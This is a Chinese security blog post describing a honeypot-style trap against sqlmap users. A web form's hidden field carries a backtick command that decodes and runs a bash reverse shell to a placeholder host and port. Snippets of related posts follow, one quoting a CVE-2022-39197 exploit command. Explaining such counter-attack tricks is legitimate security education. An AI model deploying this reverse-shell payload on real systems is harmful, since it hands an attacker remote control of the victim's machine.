可恶!没想到sqlmap也背叛了脚本小子

最新推荐文章于 2024-09-04 13:45:00 发布
最新推荐文章于 2024-09-04 13:45:00 发布
阅读量293 收藏 10
点赞数 10
文章标签: web安全 网络 安全 网络安全 系统安全 计算机网络 安全威胁分析
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jennycisp/article/details/134922628
版权

0x01 序

之前有群友丢了一个案例,提问sqlmap是否有反制漏洞,群里有大哥回复有命令执行,由于自己对这个没有了解,但sqlmap嘛又是本脚本小子的常用工具,sql注入没有sqlmap怎么测嘛,那么处于对自己的保护赶紧随着大佬的提醒去看了看文章。

在这里插入图片描述
CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

0x02 过程

找了一些之前的文章,发现大概是21年的时候有人提到过的反制方案

构造特殊的get或者post注入点来等待攻击者使用sqlmap扫描,例如下图,将get请求中的一个参数的值设置为`ls`l,倘若直接改成反弹shell的代码即可反控对方机器。

看似是利用了反引号导致执行了系统命令,sqlmap躺枪啊

介绍下shell规则中单引号、双引号、反引号、无引号的区别

单引号:单引号被识别为普通字符串,就是不识别引号里面的特殊字符,属于强引用。

双引号:双引号里面的特殊字符是可以被识别的,是弱引用。

反引号:在linux中,反引号中的内容一般是一行或多行命令,当这些命令被反引号引着,命令执行结果就会以字符串的形式被保留下来。

无引号:如何是连续的符号可以不加引号,但是如果有空格就有歧义,最好使用双引号。

于是我们可以构造一个页面,把我们需要传递的参数传入,如果攻击者没仔细看数据包就丢进sqlmap尝试注入的话就有可能导致被反制
CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

post方式的利用:

页面代码:

<html>``<head>``<meta charset="utf-8">``<title> test demo</title>``</head>``<body>``<input>search the user</input>` `<form action="test.html" method="post" enctype="text/plain">```<input type='hidden' name='name' value="A20&id=131241241&query=shell`echo YmFzaCAtaSA+JiAvZGV2L3RjcC94eHgueHh4Lnh4eC54eHgvNzc3NyAwPiYx| base64 -d|bash -i`&port=6379"/>```<input type="submit" value='提交'>``</form>``</body>``</html>``

Burp抓包查看

 ![](https://img-blog.csdnimg.cn/img_convert/5f0b34475fb1795bb2f53a483d0e4e21.png)

查看效果

那么防护方案的话就是,擦亮眼睛啊!


CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

在这里插入图片描述

网络安全技术库
关注
  • 10
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
sqlmap tamper脚本编写
m0_56578216的博客
09-22 504
SQLMap 是一款SQL注入神器,可以通过tamper 对注入payload 进行编码和变形,以达到绕过某些限制的目的。但是有些时候,SQLMap 自带的Tamper 脚本并不是特别好用,需要根据实际情况定制Tamper 脚本sqlmap的编写语言也是python,tamper脚本能增强sqlmap的功能,达到绕过检测的目的。
安全红蓝对抗反制(反捕、画像)
墨痕诉清风的博客
03-09 3657
1.蜜罐 蜜罐可以理解成互联网上的一台主机,它的作用是诱骗攻击者去对自己进行攻击,然后记录攻击者的攻击细节并生成对应的攻击者画像,是当前的一种比较主流的入侵检测系统也是一种主动防御系统。 1.1 放置高交互蜜罐 放置高交互蜜罐,例如一个邮箱服务类型的蜜罐,攻击者有可能会进行邮箱注册,这样子攻击者就主动向我们留下了自己的身份信息。 1.2 放置多个容易被发现的蜜罐 放置多个攻击者可以轻而易举发现的蜜罐,攻击者就会知道自己所在的环境是被蜜罐所包围的,有可能就会放弃进行大范围攻击,变相保护了蜜罐背后的真
溯源反制-SQLMAP反制
m0_62172162的博客
04-25 708
溯源反制-SQLMAP反制
sqlmap --os-shell反制小思路
墨痕诉清风的博客
12-15 883
前言 之前有看到goby反制和松鼠A师傅蚁剑反制的文章,再想到之前写过sqlmap的shell免杀,觉得思路其实差不多,就写一篇sqlmap反制吧。 sqlmap流量分析 (其实可以通过分析解密后sqlmap内置的backdoor后门文件(文章链接)) 具体sqlmap的攻击流程差不多是这样: 1.测试链接是否能够访问 2.判断操作系统版本 3.传递一个数组,尝试爆绝对路径 4.指定上传路径 5.使用lines terminated by 写入一个php文件,该php文件可以进...
朔源反制-170-对抗上线CS,Goby,蚁剑,Sqlmap安全工具
wuqingsix的博客
02-17 462
python cve-2022-39197.py beacon.exe http://可访问的WEB:8888/evil.svg。1、蓝队修改EXP里面的执行命令后编译,红队客户端所触发的东西在这里修改:如上线cs。步骤为:修改:EvilJar/src/main/java/Exploit.java。构造一个页面 在含有注入点的时候,其中数据包含有反制的数据包:步骤为。xx为监听的端口号 xx.xx.xx.xx为监听主机。
红蓝对抗-反制
热门推荐
Shanfenglan's blog
01-19 6万+
CATALOG1.前言2. 1.前言 初次接触反制技术,写一个文档作为记录。 2.
sqlmap蜜罐原理与实现
越努力 越自由
07-08 5768
1. bash命令特殊字符 先来说一下bash命令。在bash命令中,一些字符在封闭的双引号中,有特殊的含义。如ping "`ls`",``尖括号中间的字符会执行系统命令。ping "!!",会显示最近的一条历史记录 2. sqlmap命令分析 我们在执行sqlmap检测的时候大多数是这样的: sqlmap -uhttp://192.168.10.28/2_Shotting_Range/sql/Less-1/?id=1 如此形式的语句执行,实际上都是在shell中,执行bash命令。上面.
sqlmap自动化脚本
03-27
这个“sqlmap自动化脚本”是用户自定义的批处理脚本,旨在简化SQLMap的使用过程,避免频繁手动输入命令行。 批处理脚本(sqlmap_py.bat和sqlmap.bat)是一种Windows系统下的脚本文件,用于组合和执行一系列命令。在...
sqlmap.py 脚本 sqlmap-master.zip
10-16
sqlmap脚本,解压后可直接运行 列几个基本命令 ./sqlmap.py –h //查看帮助信息 ./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” //get注入 ./sqlmap.py –u ...
sqlmap-tamper脚本分类
09-22
web渗透,sqlmap脚本分类。渗透
渗透测试必备神器SQLMAP的所有绕waf脚本合集
10-18
在对抗Web应用防火墙(WAF)时,SQLMAP提供了一系列的绕过策略和脚本。WAF通常设置规则来阻挡已知的攻击模式,但SQL注入的灵活性使其能够避开这些静态防御。SQLMAP通过自动化的智能探测和多种技术,如盲注、时间延迟...
【实战技巧】sqlmap不为人知的骚操作
Summer's blog
05-13 1万+
前言 如果有不知道这个漏洞,可以先看看下面的文章 https://xz.aliyun.com/t/6531 0x01 注入前知识补充 sqlmap参数:–prefix,–suffix 在有些环境中,需要在注入的payload的前面或者后面加一些字符,来保证payload的正常执行。 例如,代码中是这样调用数据库的: $query = "SELECT * FROM users WHERE id...
sqlmap深入分析-优质文章整理篇(sqlmap 源码分析、os-shell 原理、攻防角度使用sqlmap
Love&Share
12-30 4127
文章目录代码攻防 Sqlmap 确实是一个很不错的项目,值得去分析研究,图引用自 tk 教主的微博 关于 sqlmap 的源码分析,以及原理等等早已有很多大佬分享,这里直接整理了一份学习路线 代码 首先是 sqlmap 源码分析 sqlmap 项目剖析1 sqlmap 项目剖析2 sqlmap 项目剖析3 sqlmap 项目剖析4 sqlmap源码分析与学习 sqlmap 流程脑图 os-shell 原理 sqlmap --os-shell原理 Sqlmap之os-shell原理分析 攻防 实.
网络安全】逻辑漏洞:绕过应用程序重要功能
等风来
09-01 199
拦截请求,将其发送到 Burp 中的 Repeater,当我尝试重放请求时,我收到了“ 500 响应”,表示出现错误
网络安全】漏洞挖掘
anquan2233的博客
08-29 1493
在springframeworl/expression/spel/stand/InternalSpelExpressionParser/doParseExpression()方法中、会在tokenizer.process()中 对token进行 源码与字节码的判断操作、继续向下。会进入到springframework/cloud/function/context/config/RoutingFunction/functionFromExpression()方法。Payload 的构造可以参考官方测试用例。
网络安全(黑客)自学
最新发布
白帽子凯哥聊黑客
09-04 874
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
网络安全服务基础Windows--第12节-域与活动目录
m0_65771743的博客
09-03 1031
域中的计算机可以共享资源,例如⽂件系统和打印机,⽤户只需在域中进⾏⼀次登录(单点登录),就可以访问其有权限的所有资源。我们在服务器上通过查找⼀个对象可以查到的所有关联信息总和,如⼀个⽤户,如果我们在服务器已给这个⽤户定义了讲如:⽤户名、⽤户密码、⼯作单位、联系电话、家庭住址等,那上⾯所说的总和⼴义上理解就是“⽤户”这个名字的名字空间,因为我们只输⼊⼀个⽤户名即可找到上⾯我所列的⼀切信息。例如,在AD中,域控制器的名称会映射到其在DNS中的记录,以便⽹络中的其他服务和客户端可以找到它。
网络安全知识:什么是访问控制列表 (ACL)?
2401_84434570的博客
09-04 648
使用 ACL 的操作系统包括 Microsoft Windows NT/2000、Novell 的 Netware、Digital 的 OpenVMS 和基于 UNIX 的系统。通常,标准 ACL 实施在靠近其要保护的目的地的位置,而扩展 ACL 则放置在靠近源的位置。ACL 有多种形式,每种形式都适用于不同的场景,并提供不同级别的控制和复杂性。每个对象都与一个安全属性相关联,该属性将其链接到其 ACL,其中包含每个具有该对象访问权限的用户的条目。将最常触发的规则置于 ACL 的顶部以优化性能。
2024年“羊城杯”粤港澳大湾区网络安全大赛 初赛 Web&数据安全&AI 题解WriteUp
Jay17的博客
09-04 921
2024年“羊城杯”粤港澳大湾区网络安全大赛 初赛 Web&数据安全&AI 题解WriteUp
SQLMap渗透测试指南:使用与tamper脚本解析
"该资源为一个关于sqlmap的PPT介绍,主要讲解了如何使用sqlmap这个渗透测试工具,特别是它的-tamper选项以及在Burp Suite中的应用。" SQLMap是一个广泛使用的开源渗透测试工具,专门针对SQL注入漏洞进行自动化检测...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

网络安全技术库

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值